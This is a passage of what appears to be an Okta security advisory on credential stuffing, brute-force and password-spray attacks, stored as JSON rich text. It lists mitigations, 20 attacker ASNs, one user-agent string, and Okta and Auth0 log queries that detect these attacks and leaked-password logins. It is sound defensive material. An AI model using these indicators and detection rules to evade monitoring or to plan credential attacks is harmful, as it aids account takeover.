authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny access by location using a WAF or via the Country-based Access Control \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/customize/actions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Action\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny authentication requests from IPs with poor reputation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny requests made via anonymizing services via \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/network/about-dynamic-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Network 
Zones\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/threat-insight/configure-threatinsight.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" in \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"log and enforce \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"mode to deny attempts based on the volume and velocity of failed requests from an IP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/CAPTCHA/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CAPTCHA\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" challenges on high risk 
logins\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/suspicious-ip-throttling\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious IP Throttling\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"to slow down login attempts from suspicious IPs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/bot-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bot Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"to present CAPTCHA challenges to requests from suspicious IPs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use 3P 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/customize/actions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 Actions \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"integrations to check whether an IP is associated with an anonymizing proxy \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor for and respond to anomalous sign-in behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce per-user \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Account Lockout\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\". 
Exempt requests from devices that have successfully authenticated\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor for \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" events and rate limit violations \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/brute-force-protection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute-force Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" to block and lockout accounts subject to persistent failed authentication requests \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor for sign-in events using invalid usernames/non-existent users and/or previously breached passwords\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"TTPs used in Recent Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Top 20 
ASNs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Autonomous System Number\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Provider\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"53667 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FranTech Solutions\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"62744 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Quintex Alliance Consulting\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"60729 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stiftung Erneuerbare 
Freiheit\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1101\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SURF B.V.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"210558 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1337 Services GmbH\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"197540 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"netcup GmbH\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"16276 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OVH SAS\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"60404 
\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Liteserver\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"210644 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AEZA INTERNATIONAL LTD\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"399532 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Layer LLC\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"200651 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FlokiNET ehf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"44925\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1984 
ehf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"51396\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Pfcloud UG\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4224 \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Calyx Institute\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"51852\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Private Layer INC\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"56655\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"TerraHost 
AS\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"36352\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"HostPapa\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"208323\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Foundation for Applied Privacy\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"63949\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Akamai Connected Cloud\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"41281\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"KeFF Networks Ltd\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User 
Agent\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Relevant System Log Queries: The Okta Platform\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight has Detected Access Requests from IPs Associated with Suspicious Behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspected Brute Force Attack 
(\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/001/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.001\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason eq \\\"Login failures\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspected Credential Stuffing Attack (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Login failures with high unknown users count\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspected Password Spray Attack 
(\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/003/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.003\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Password Spray\\\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Targeted Brute Force Attack against a Specific Org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.attack.start\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nRelevant System Log Queries: The Auth0 Platform\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed login 
request\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"f\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed login: Invalid username/email address\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"fu\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Failed login: Invalid password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"fp\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Login attempt from a known leaked password\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"pwd_leak\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Signup (registration) attempt from a leaked 
